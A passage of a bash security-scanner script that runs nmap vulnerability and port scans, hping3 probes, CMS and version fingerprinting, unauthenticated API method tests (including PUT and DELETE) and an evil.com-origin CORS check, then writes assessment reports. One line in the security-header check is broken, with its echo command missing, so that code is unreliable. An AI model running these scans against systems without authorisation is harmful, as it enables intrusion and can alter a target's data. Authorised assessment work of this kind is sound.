    CERT_SUBJECT=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -subject | sed 's/subject=//')
    
    log_debug "Extracting certificate dates..."
    CERT_DATES=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -dates)
    
    echo "$CERT_ISSUER" > cert_issuer.txt
    echo "$CERT_SUBJECT" > cert_subject.txt
    echo "$CERT_DATES" > cert_dates.txt
    
    log_debug "Certificate issuer: $CERT_ISSUER"
    log_debug "Certificate subject: $CERT_SUBJECT"
    
    # Enumerate SSL/TLS ciphers
    log_info "Enumerating SSL/TLS ciphers..."
    log_debug "Running nmap ssl-enum-ciphers script on port 443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_ciphers.txt > /dev/null 2>&1
    else
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -oN ssl_ciphers.txt > /dev/null 2>&1
    fi
    
    # Check for TLS versions
    log_debug "Analyzing TLS protocol versions..."
    TLS_12=$(grep -c "TLSv1.2" ssl_ciphers.txt || echo "0")
    TLS_13=$(grep -c "TLSv1.3" ssl_ciphers.txt || echo "0")
    TLS_10=$(grep -c "TLSv1.0" ssl_ciphers.txt || echo "0")
    TLS_11=$(grep -c "TLSv1.1" ssl_ciphers.txt || echo "0")
    
    echo "TLSv1.0: $TLS_10" > tls_versions.txt
    echo "TLSv1.1: $TLS_11" >> tls_versions.txt
    echo "TLSv1.2: $TLS_12" >> tls_versions.txt
    echo "TLSv1.3: $TLS_13" >> tls_versions.txt
    
    log_debug "TLS versions found - 1.0:$TLS_10 1.1:$TLS_11 1.2:$TLS_12 1.3:$TLS_13"
    
    # Check for SSL vulnerabilities
    log_info "Checking for SSL/TLS vulnerabilities..."
    log_debug "Running SSL vulnerability scripts (heartbleed, poodle, dh-params)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    fi
    
    log_success "SSL/TLS analysis complete"
}

################################################################################
# Port Scanning with Service Detection
################################################################################
port_scanning() {
    log_info "Performing comprehensive port scan..."
    log_debug "Target IP: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # Quick scan of top 1000 ports
    log_info "Scanning top 1000 ports..."
    log_debug "Running nmap with service version detection (-sV) and default scripts (-sC)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN port_scan_top1000.txt > /dev/null 2>&1
    else
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -oN port_scan_top1000.txt > /dev/null 2>&1
    fi
    
    # Count open ports
    OPEN_PORTS=$(grep -c "^[0-9]*/tcp.*open" port_scan_top1000.txt || echo "0")
    echo "$OPEN_PORTS" > open_ports_count.txt
    log_debug "Found $OPEN_PORTS open ports"
    
    # Extract open ports list with versions
    log_debug "Extracting open ports list with service information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | awk '{print $1, $3, $4, $5, $6}' > open_ports_list.txt
    
    # Detect service versions for old software
    log_info "Detecting service versions..."
    log_debug "Filtering service version information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | grep -E "version|product" > service_versions.txt
    
    log_success "Port scan complete: $OPEN_PORTS open ports found"
}

################################################################################
# Vulnerability Scanning
################################################################################
vulnerability_scanning() {
    if [ "$VULN_SCAN" = false ]; then
        log_info "Vulnerability scanning disabled"
        log_debug "Skipping vulnerability scanning"
        return
    fi
    
    log_info "Performing vulnerability scanning (this may take 10-20 minutes)..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # NMAP vulnerability scripts
    log_info "Running NMAP vulnerability scripts..."
    log_debug "Starting comprehensive vulnerability scan on all ports (-p-)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script vuln -p- "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    else
        nmap --script vuln -p- "$IP_ADDRESS" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    fi
    VULN_PID=$!
    log_debug "Vulnerability scan PID: $VULN_PID"
    
    # Wait with progress indicator
    log_debug "Waiting for vulnerability scan to complete..."
    while kill -0 $VULN_PID 2>/dev/null; do
        echo -n "."
        sleep 5
    done
    echo
    
    # Parse vulnerability results
    if [ -f nmap_vuln_scan.txt ]; then
        log_debug "Parsing vulnerability scan results"
        grep -i "VULNERABLE" nmap_vuln_scan.txt > vulnerabilities_found.txt || echo "No vulnerabilities found" > vulnerabilities_found.txt
        VULN_COUNT=$(grep -c "VULNERABLE" nmap_vuln_scan.txt || echo "0")
        echo "$VULN_COUNT" > vulnerability_count.txt
        log_success "Vulnerability scan complete: $VULN_COUNT vulnerabilities found"
        log_debug "Vulnerability details saved to: vulnerabilities_found.txt"
    fi
    
    # Check for specific vulnerabilities
    log_info "Checking for common HTTP vulnerabilities..."
    log_debug "Running HTTP vulnerability scripts on ports 80,443,8080,8443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN http_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -oN http_vulnerabilities.txt > /dev/null 2>&1
    fi
    log_debug "HTTP vulnerability scan complete"
}

################################################################################
# hping3 Testing
################################################################################
hping3_testing() {
    if ! command -v hping3 >/dev/null 2>&1; then
        log_warning "hping3 not installed, skipping firewall tests"
        log_debug "hping3 command not found in PATH"
        return
    fi
    
    log_info "Performing hping3 firewall tests..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # TCP SYN scan
    log_info "Testing TCP SYN response..."
    log_debug "Sending 5 TCP SYN packets to port 80"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -S -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    else
        timeout 10 hping3 -S -p 80 -c 5 "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    fi
    log_debug "TCP SYN test complete"
    
    # TCP ACK scan (firewall detection)
    log_info "Testing firewall with TCP ACK..."
    log_debug "Sending 5 TCP ACK packets to port 80 for firewall detection"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -A -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    else
        timeout 10 hping3 -A -p 80 -c 5 "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    fi
    log_debug "TCP ACK test complete"
    
    # ICMP test
    log_info "Testing ICMP response..."
    log_debug "Sending 5 ICMP echo requests"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -1 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    else
        timeout 10 hping3 -1 -c 5 "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    fi
    log_debug "ICMP test complete"
    
    log_success "hping3 tests complete"
}

################################################################################
# Asset Discovery
################################################################################
asset_discovery() {
    log_info "Performing detailed asset discovery..."
    log_debug "Creating assets directory"
    
    mkdir -p assets
    
    # Web technology detection
    log_info "Detecting web technologies..."
    log_debug "Fetching HTTP headers from https://${DOMAIN}"
    curl -s -I "https://${DOMAIN}" | grep -i "server\|x-powered-by\|x-aspnet-version" > assets/web_technologies.txt
    log_debug "Web technologies saved to: assets/web_technologies.txt"
    
    # Detect CMS
    log_info "Detecting CMS and frameworks..."
    log_debug "Analyzing page content for CMS signatures"
    curl -s "https://${DOMAIN}" | grep -iE "wordpress|joomla|drupal|magento|shopify" > assets/cms_detection.txt || echo "No CMS detected" > assets/cms_detection.txt
    log_debug "CMS detection complete"
    
    # JavaScript libraries
    log_info "Detecting JavaScript libraries..."
    log_debug "Searching for common JavaScript libraries"
    curl -s "https://${DOMAIN}" | grep -oE "jquery|angular|react|vue|bootstrap" | sort -u > assets/js_libraries.txt || echo "None detected" > assets/js_libraries.txt
    log_debug "JavaScript libraries saved to: assets/js_libraries.txt"
    
    # Check for common files
    log_info "Checking for common files..."
    log_debug "Testing for robots.txt, sitemap.xml, security.txt, etc."
    for file in robots.txt sitemap.xml security.txt .well-known/security.txt humans.txt; do
        log_debug "Checking for: $file"
        if curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}/${file}" | grep -q "200"; then
            echo "$file: Found" >> assets/common_files.txt
            log_debug "Found: $file"
            curl -s "https://${DOMAIN}/${file}" > "assets/${file//\//_}"
        fi
    done
    
    # Server fingerprinting
    log_info "Fingerprinting server..."
    log_debug "Running nmap HTTP server header and title scripts"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    else
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    fi
    
    log_success "Asset discovery complete"
}

################################################################################
# Old Software Detection
################################################################################
detect_old_software() {
    log_info "Detecting outdated software versions..."
    log_debug "Creating old_software directory"
    
    mkdir -p old_software
    
    # Parse service versions from port scan
    if [ -f service_versions.txt ]; then
        log_debug "Analyzing service versions for outdated software"
        
        # Check for old Apache versions
        log_debug "Checking for old Apache versions..."
        grep -i "apache" service_versions.txt | grep -E "1\.|2\.0|2\.2" > old_software/apache_old.txt || true
        
        # Check for old OpenSSH versions
        log_debug "Checking for old OpenSSH versions..."
        grep -i "openssh" service_versions.txt | grep -E "[1-6]\." > old_software/openssh_old.txt || true
        
        # Check for old PHP versions
        log_debug "Checking for old PHP versions..."
        grep -i "php" service_versions.txt | grep -E "[1-5]\." > old_software/php_old.txt || true
        
        # Check for old MySQL versions
        log_debug "Checking for old MySQL versions..."
        grep -i "mysql" service_versions.txt | grep -E "[1-4]\." > old_software/mysql_old.txt || true
        
        # Check for old nginx versions
        log_debug "Checking for old nginx versions..."
        grep -i "nginx" service_versions.txt | grep -E "0\.|1\.0|1\.1[0-5]" > old_software/nginx_old.txt || true
    fi
    
    # Check SSL/TLS for old versions
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        log_debug "Outdated TLS protocols detected"
        echo "Outdated TLS protocols detected: TLSv1.0 or TLSv1.1" > old_software/tls_old.txt
    fi
    
    # Count old software findings
    OLD_SOFTWARE_COUNT=$(find old_software -type f ! -empty | wc -l)
    echo "$OLD_SOFTWARE_COUNT" > old_software_count.txt
    
    if [ "$OLD_SOFTWARE_COUNT" -gt 0 ]; then
        log_warning "Found $OLD_SOFTWARE_COUNT outdated software components"
        log_debug "Outdated software details saved in old_software/ directory"
    else
        log_success "No obviously outdated software detected"
    fi
}

################################################################################
# API Discovery
################################################################################
api_discovery() {
    if [ "$API_SCAN" = false ]; then
        log_info "API scanning disabled"
        log_debug "Skipping API discovery"
        return
    fi
    
    log_info "Discovering APIs..."
    log_debug "Creating api_discovery directory"
    
    mkdir -p api_discovery
    
    # Common API paths
    API_PATHS=(
        "/api"
        "/api/v1"
        "/api/v2"
        "/rest"
        "/graphql"
        "/swagger"
        "/swagger.json"
        "/api-docs"
        "/openapi.json"
        "/.well-known/openapi"
    )
    
    log_debug "Testing ${#API_PATHS[@]} common API endpoints"
    for path in "${API_PATHS[@]}"; do
        log_debug "Testing: $path"
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${path}")
        if [ "$HTTP_CODE" != "404" ]; then
            echo "$path: HTTP $HTTP_CODE" >> api_discovery/endpoints_found.txt
            log_debug "Found API endpoint: $path (HTTP $HTTP_CODE)"
            curl -s "https://${DOMAIN}${path}" > "api_discovery/${path//\//_}.txt" 2>/dev/null || true
        fi
    done
    
    # Check for API documentation
    log_info "Checking for API documentation..."
    log_debug "Testing for Swagger UI and API docs"
    curl -s "https://${DOMAIN}/swagger-ui" > api_discovery/swagger_ui.txt 2>/dev/null || true
    curl -s "https://${DOMAIN}/api/docs" > api_discovery/api_docs.txt 2>/dev/null || true
    
    log_success "API discovery complete"
}

################################################################################
# API Permission Testing
################################################################################
api_permission_testing() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping permission testing"
        return
    fi
    
    log_info "Testing API permissions..."
    log_debug "Creating api_permissions directory"
    
    mkdir -p api_permissions
    
    # Test common API endpoints without authentication
    if [ -f api_discovery/endpoints_found.txt ]; then
        log_debug "Testing discovered API endpoints for authentication issues"
        while IFS= read -r endpoint; do
            API_PATH=$(echo "$endpoint" | cut -d: -f1)
            
            # Test GET without auth
            log_info "Testing $API_PATH without authentication..."
            log_debug "Sending unauthenticated GET request to $API_PATH"
            HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${API_PATH}")
            echo "$API_PATH: $HTTP_CODE" >> api_permissions/unauth_access.txt
            log_debug "Response: HTTP $HTTP_CODE"
            
            # Test common HTTP methods
            log_debug "Testing HTTP methods on $API_PATH"
            for method in GET POST PUT DELETE PATCH; do
                HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "https://${DOMAIN}${API_PATH}")
                if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then
                    log_warning "$API_PATH allows $method without authentication (HTTP $HTTP_CODE)"
                    echo "$API_PATH: $method - HTTP $HTTP_CODE" >> api_permissions/method_issues.txt
                fi
            done
        done < api_discovery/endpoints_found.txt
    fi
    
    # Check for CORS misconfigurations
    log_info "Checking CORS configuration..."
    log_debug "Testing CORS headers with evil.com origin"
    curl -s -H "Origin: https://evil.com" -I "https://${DOMAIN}/api" | grep -i "access-control" > api_permissions/cors_headers.txt || true
    
    log_success "API permission testing complete"
}

################################################################################
# HTTP Security Headers
################################################################################
http_security_headers() {
    log_info "Analyzing HTTP security headers..."
    log_debug "Fetching headers from https://${DOMAIN}"
    
    # Get headers from main domain
    curl -I "https://${DOMAIN}" 2>/dev/null > http_headers.txt
    
    # Check for specific security headers
    declare -A HEADERS=(
        ["x-frame-options"]="X-Frame-Options"
        ["x-content-type-options"]="X-Content-Type-Options"
        ["strict-transport-security"]="Strict-Transport-Security"
        ["content-security-policy"]="Content-Security-Policy"
        ["referrer-policy"]="Referrer-Policy"
        ["permissions-policy"]="Permissions-Policy"
        ["x-xss-protection"]="X-XSS-Protection"
    )
    
    log_debug "Checking for security headers"
    > security_headers_status.txt
    for header in "${!HEADERS[@]}"; do
        if grep -qi "^${header}:" http_headers.txt; then
 security_headers_status.txt
        else
            echo "${HEADERS[$header]}: Missing" >> security_headers_status.txt
        fi
    done
    
    log_success "HTTP security headers analysis complete"
}

################################################################################
# Subdomain Scanning
################################################################################
scan_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ] || [ ! -f subdomains_discovered.txt ]; then
        log_debug "Subdomain scanning disabled or no subdomains discovered"
        return
    fi
    
    log_info "Scanning discovered subdomains..."
    log_debug "Creating subdomain_scans directory"
    
    mkdir -p subdomain_scans
    
    local count=0
    while IFS= read -r subdomain; do
        count=$((count + 1))
        log_info "Scanning subdomain $count/$SUBDOMAIN_COUNT: $subdomain"
        log_debug "Testing accessibility of $subdomain"
        
        # Quick check if subdomain is accessible
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${subdomain}" --max-time 5)
        
        if echo "$HTTP_CODE" | grep -q "^[2-4]"; then
            log_debug "$subdomain is accessible (HTTP $HTTP_CODE)"
            
            # Get headers
            log_debug "Fetching headers from $subdomain"
            curl -I "https://${subdomain}" 2>/dev/null > "subdomain_scans/${subdomain}_headers.txt"
            
            # Quick port check (top 100 ports)
            log_debug "Scanning top 100 ports on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap --top-ports 100 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            else
                nmap --top-ports 100 "$subdomain" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            fi
            
            # Check for old software
            log_debug "Checking service versions on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap -sV --top-ports 10 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            else
                nmap -sV --top-ports 10 "$subdomain" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            fi
            
            log_success "Scanned: $subdomain (HTTP $HTTP_CODE)"
        else
            log_warning "Subdomain not accessible: $subdomain (HTTP $HTTP_CODE)"
        fi
    done < subdomains_discovered.txt
    
    log_success "Subdomain scanning complete"
}

################################################################################
# Generate Executive Summary
################################################################################
generate_executive_summary() {
    log_info "Generating executive summary..."
    log_debug "Creating executive summary report"
    
    cat > "$EXEC_REPORT" << EOF
# Executive Summary
## Enhanced Security Assessment Report

**Target Domain:** $DOMAIN  
**Target IP:** $IP_ADDRESS  
**Scan Date:** $SCAN_DATE  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE

---

## Overview

This report summarizes the comprehensive security assessment findings for $DOMAIN. The assessment included passive reconnaissance, vulnerability scanning, asset discovery, and API security testing.

---

## Key Findings

### 1. Domain Information

- **Primary Domain:** $DOMAIN
- **IP Address:** $IP_ADDRESS
- **Subdomains Discovered:** $(cat subdomain_count.txt)

### 2. SSL/TLS Configuration

**Certificate Information:**
\`\`\`
Issuer: $(cat cert_issuer.txt)
Subject: $(cat cert_subject.txt)
$(cat cert_dates.txt)
\`\`\`

**TLS Protocol Support:**
\`\`\`
$(cat tls_versions.txt)
\`\`\`

**Assessment:**
EOF

    # Add TLS assessment
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "⚠️ **Warning:** Outdated TLS protocols detected (TLSv1.0/1.1)" >> "$EXEC_REPORT"
    else
        echo "✅ **Good:** Only modern TLS protocols detected (TLSv1.2/1.3)" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 3. Port Exposure

- **Open Ports (Top 1000):** $(cat open_ports_count.txt)

**Open Ports List:**
\`\`\`
$(cat open_ports_list.txt)
\`\`\`

### 4. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ] && [ -f vulnerability_count.txt ]; then
        cat >> "$EXEC_REPORT" << EOF
- **Vulnerabilities Found:** $(cat vulnerability_count.txt)

**Critical Vulnerabilities:**
\`\`\`
$(head -20 vulnerabilities_found.txt)
\`\`\`

EOF
    else
        echo "Vulnerability scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 5. Outdated Software

- **Outdated Components Found:** $(cat old_software_count.txt)

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        echo "**Outdated Software Detected:**" >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
        find old_software -type f ! -empty -exec basename {} \; >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 6. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        if [ -f api_discovery/endpoints_found.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Endpoints Discovered:**
\`\`\`
$(cat api_discovery/endpoints_found.txt)
\`\`\`

EOF
        fi
        
        if [ -f api_permissions/method_issues.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Permission Issues:**
\`\`\`
$(cat api_permissions/method_issues.txt)
\`\`\`

EOF
        fi
    else
        echo "API scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 7. HTTP Security Headers

\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## Priority Recommendations

### Immediate Actions (Priority 1)

EOF

    # Add specific recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. **Disable TLSv1.0/1.1:** Update TLS configuration immediately" >> "$EXEC_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. **Patch Vulnerabilities:** Address $(cat vulnerability_count.txt) identified vulnerabilities" >> "$EXEC_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. **Update Software:** Upgrade $(cat old_software_count.txt) outdated components" >> "$EXEC_REPORT"
    fi
    
    if grep -q "Missing" security_headers_status.txt; then
        echo "4. **Implement Security Headers:** Add missing HTTP security headers" >> "$EXEC_REPORT"
    fi
    
    if [ -f api_permissions/method_issues.txt ]; then
        echo "5. **Fix API Permissions:** Implement proper authentication on exposed APIs" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### Review Actions (Priority 2)

1. Review all open ports and close unnecessary services
2. Audit subdomain inventory and decommission unused subdomains
3. Implement API authentication and authorization
4. Regular vulnerability scanning schedule
5. Software update policy and procedures

---

## Next Steps

1. Review detailed technical and vulnerability reports
2. Prioritize remediation based on risk assessment
3. Implement security improvements
4. Schedule follow-up assessment after remediation

---

**Report Generated:** $(date)  
**Scan Directory:** $SCAN_DIR

**Additional Reports:**
- Technical Report: technical_report.md
- Vulnerability Report: vulnerability_report.md
- API Security Report: api_security_report.md

EOF

    log_success "Executive summary generated: $EXEC_REPORT"
    log_debug "Executive summary saved to: $SCAN_DIR/$EXEC_REPORT"
}

################################################################################
# Generate Technical Report
################################################################################
generate_technical_report() {
    log_info "Generating detailed technical report..."
    log_debug "Creating technical report"
    
    cat > "$TECH_REPORT" << EOF
# Technical Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE  
**Classification:** CONFIDENTIAL

---

## 1. Scope

**Primary Target:** $DOMAIN  
**IP Address:** $IP_ADDRESS  
**Subdomain Scanning:** $([ "$SCAN_SUBDOMAINS" = true ] && echo "Enabled" || echo "Disabled")  
**Vulnerability Scanning:** $([ "$VULN_SCAN" = true ] && echo "Enabled" || echo "Disabled")  
**API Testing:** $([ "$API_SCAN" = true ] && echo "Enabled" || echo "Disabled")

---

## 2. DNS Configuration

\`\`\`
$(cat dns_records.txt)
\`\`\`

---

## 3. SSL/TLS Configuration

\`\`\`
$(cat certificate_details.txt)
\`\`\`

---

## 4. Port Scan Results

\`\`\`
$(cat port_scan_top1000.txt)
\`\`\`

---

## 5. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 5.1 NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

### 5.2 HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

### 5.3 SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 6. Asset Discovery

### 6.1 Web Technologies

\`\`\`
$(cat assets/web_technologies.txt)
\`\`\`

### 6.2 CMS Detection

\`\`\`
$(cat assets/cms_detection.txt)
\`\`\`

### 6.3 JavaScript Libraries

\`\`\`
$(cat assets/js_libraries.txt)
\`\`\`

### 6.4 Common Files

\`\`\`
$(cat assets/common_files.txt 2>/dev/null || echo "No common files found")
\`\`\`

---

## 7. Outdated Software

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        for file in old_software/*.txt; do
            if [ -f "$file" ] && [ -s "$file" ]; then
                echo "### $(basename "$file" .txt)" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                cat "$file" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                echo >> "$TECH_REPORT"
            fi
        done
    else
        echo "No outdated software detected." >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 8. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 8.1 API Endpoints

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

### 8.2 API Permissions

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No permission issues found")
\`\`\`

### 8.3 CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS headers found")
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 9. HTTP Security Headers

\`\`\`
$(cat http_headers.txt)
\`\`\`

**Security Headers Status:**
\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## 10. Recommendations

### 10.1 Immediate Actions

EOF

    # Add recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. Disable TLSv1.0 and TLSv1.1 protocols" >> "$TECH_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. Patch identified vulnerabilities" >> "$TECH_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. Update outdated software components" >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

### 10.2 Review Actions

1. Review all open ports and services
2. Audit subdomain inventory
3. Implement missing security headers
4. Review API authentication
5. Regular security assessments

---

## 11. Document Control

**Classification:** CONFIDENTIAL  
**Distribution:** Security Team, Infrastructure Team  
**Prepared By:** Enhanced Security Scanner v$VERSION  
**Date:** $(date)

---

**END OF TECHNICAL REPORT**
EOF

    log_success "Technical report generated: $TECH_REPORT"
    log_debug "Technical report saved to: $SCAN_DIR/$TECH_REPORT"
}

################################################################################
# Generate Vulnerability Report
################################################################################
generate_vulnerability_report() {
    if [ "$VULN_SCAN" = false ]; then
        log_debug "Vulnerability scanning disabled, skipping vulnerability report"
        return
    fi
    
    log_info "Generating vulnerability report..."
    log_debug "Creating vulnerability report"
    
    cat > "$VULN_REPORT" << EOF
# Vulnerability Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION

---

## Executive Summary

**Total Vulnerabilities Found:** $(cat vulnerability_count.txt)

---

## 1. NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

---

## 2. HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

---

## 3. SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

---

## 4. Detailed Findings

\`\`\`
$(cat vulnerabilities_found.txt)
\`\`\`

---

**END OF VULNERABILITY REPORT**
EOF

    log_success "Vulnerability report generated: $VULN_REPORT"
    log_debug "Vulnerability report saved to: $SCAN_DIR/$VULN_REPORT"
}

################################################################################
# Generate API Security Report
################################################################################
generate_api_report() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping API report"
        return
    fi
    
    log_info "Generating API security report..."
    log_debug "Creating API security report"
    
    cat > "$API_REPORT" << EOF
# API Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Scanner Version:** $VERSION

---

## 1. API Discovery

### 1.1 Endpoints Found

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

---

## 2. Permission Testing

### 2.1 Unauthenticated Access

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No unauthenticated access issues")
\`\`\`

### 2.2 HTTP Method Issues

\`\`\`
$(cat api_permissions/method_issues.txt 2>/dev/null || echo "No method issues found")
\`\`\`

---

## 3. CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS issues found")
\`\`\`

---

**END OF API SECURITY REPORT**
EOF

    log_success "API security report generated: $API_REPORT"
    log_debug "API security report saved to: $SCAN_DIR/$API_REPORT"
}

################################################################################
# Main Execution
################################################################################
main() {
    echo "========================================"
    echo "Enhanced Security Scanner v${VERSION}"
    echo "========================================"
    echo
    log_debug "Script started at $(date)"
    log_debug "Network interface: $NETWORK_INTERFACE"
    log_debug "Debug mode: $DEBUG"
    echo
    
    # Check dependencies
    check_dependencies
    
    # Initialize scan
    initialize_scan
    
    # Run scans
    log_debug "Starting DNS reconnaissance phase"
    dns_reconnaissance
    
    log_debug "Starting subdomain discovery phase"
    discover_subdomains
    
    log_debug "Starting SSL/TLS analysis phase"
    ssl_tls_analysis
    
    log_debug "Starting port scanning phase"
    port_scanning
    
    if [ "$VULN_SCAN" = true ]; then
        log_debug "Starting vulnerability scanning phase"
        vulnerability_scanning
    fi
    
    log_debug "Starting hping3 testing phase"
    hping3_testing
    
    log_debug "Starting asset discovery phase"
    asset_discovery
    
    log_debug "Starting old software detection phase"
    detect_old_software
    
    if [ "$API_SCAN" = true ]; then
        log_debug "Starting API discovery phase"
        api_discovery
